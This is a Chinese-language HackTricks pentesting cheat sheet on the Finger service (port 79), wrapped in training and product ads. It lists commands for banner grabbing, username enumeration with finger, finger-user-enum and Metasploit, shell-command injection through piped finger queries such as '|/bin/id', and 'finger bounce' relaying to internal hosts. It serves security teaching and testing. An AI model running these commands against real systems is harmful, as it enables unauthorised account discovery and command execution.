79 - Pentesting Finger

学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

即时可用的漏洞评估和渗透测试设置。从任何地方运行完整的渗透测试,提供 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。

基本信息

Finger 程序/服务用于检索计算机用户的详细信息。通常,提供的信息包括 用户的登录名、全名,在某些情况下,还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果可用)、用户登录的时间、非活动时间(闲置时间)、用户最后一次阅读邮件的时间,以及用户的计划和项目文件的内容。

默认端口: 79

PORT   STATE SERVICE
79/tcp open  finger

枚举

横幅抓取/基本连接

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

用户枚举

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

或者你可以使用 finger-user-enum 来自 pentestmonkey,一些示例:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap 执行脚本以使用默认脚本

Metasploit 使用的技巧比 Nmap 更多

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

命令执行

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

使用系统作为指纹中继

finger user@host@victim
finger @internal@external

即时可用的漏洞评估和渗透测试设置。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。

学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated